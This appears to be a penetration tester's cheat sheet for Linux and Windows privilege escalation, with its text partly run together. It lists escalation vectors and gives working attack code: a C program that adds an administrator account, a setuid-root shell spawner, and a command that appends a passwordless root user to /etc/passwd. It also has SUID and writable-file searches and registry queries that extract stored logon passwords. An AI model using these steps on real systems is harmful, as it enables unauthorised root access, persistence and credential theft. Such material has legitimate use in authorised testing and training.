Priv Escalation
​https://payatu.com/guide-linux-privilege-escalation​
sudo -l
Kernel Exploits
OS Exploits
Password reuse (mysql, .bash_history, 000-default.conf...)
Known binaries with suid flag and interactive (nmap)
Custom binaries with suid flag either using other binaries or with command execution
Writable files owned by root that get executed (cronjobs)
MySQL as root
Vulnerable services (chkrootkit, logrotate)
Writable /etc/passwd
Readable .bash_history
SSH private key
Listening ports on localhost
/etc/fstab
/etc/exports
/var/mail
Process as other user (root) executing something you have permissions to modify
SSH public key + Predictable PRNG
apt update hooking (Pre-Invoke)
Capabilities
Kernel Exploits
OS Exploits
Pass The Hash
Password reuse
DLL hijacking (Path)
Vulnerable services
Writable services binaries path
Unquoted services
Listening ports on localhost
Registry keys
Linux: https://github.com/lucyoa/kernel-exploits​
Windows: https://github.com/abatchy17/WindowsExploits​
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/http://www.fuzzysecurity.com/tutorials/16.html
​
Windows Add User
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */​int main (){int i;i=system ("net user <username> <password> /add && net localgroup administrators <username> /add");return 0;}
​
SUID Change
SUID​Set owner user ID.​int main(void){setresuid(0, 0, 0);system("/bin/bash");}​
Privilege Escalation:#Find Binaries that will execute as the ownerfind / -perm -u=s -type f 2>/dev/null​#Find binaries that will execute as the groupfind / -perm -g=s -type f 2>/dev/null​#Find sticky-bit binariesfind / -perm -1000 -type d 2>/dev/null​find / -perm -4000 2>/dev/null​writable by everyonefind / -writable -type f 2>/dev/null​World writeable directoriesfind / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root​World writeable filesfind / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null​Writeable config filesfind /etc/ -writable -type f 2>/dev/null​find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null​
Window Exploit Suggester
python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quietpython windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls
Windows Priv Escalation
AlwaysInstallElevatedCheck if the following registry settings are set to "1"reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"​
​
Basic Linux Enumeration
Distribution type & kernel versioncat /etc/*release*uname -arpm -q kerneldmesg | grep -i linux​Default writeable directory / folder/tmp/dev/shm​Search for passwordsSearch for password within config.phpgrep -R 'password' config.php​Find possible other writeable directory / folderfind / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;​Service(s) running as root userps aux | grep rootps -ef | grep root​Installed applicationsls -lah /usr/bin/ls -lah /sbin/dpkg -lrpm -qals -lah /var/cache/apt/archivesOls -lah /var/cache/yum/​Scheduled jobscrontab -lls -la /etc/cron*ls -lah /var/spool/cronls -la /etc/ | grep croncat /etc/crontabcat /etc/anacrontab​Find pattern in file:grep -rnw '/etc/passwd' -e 'root'​Sticky bit, SGID, SUID, GUIDSticky bitfind / -perm -1000 -type d 2>/dev/null​SGID (chmod 2000)find / -perm -g=s -type f 2>/dev/null​SUID (chmod 4000)find / -perm -u=s -type f 2>/dev/nullfind /* -user root -perm -4000 -print 2>/dev/null​SUID or GUIDfind / -perm -g=s -o -perm -u=s -type f 2>/dev/null​Add user to /etc/passwd and root groupecho hodor::0:0:root:/root:/bin/bash >> /etc/passwd​
​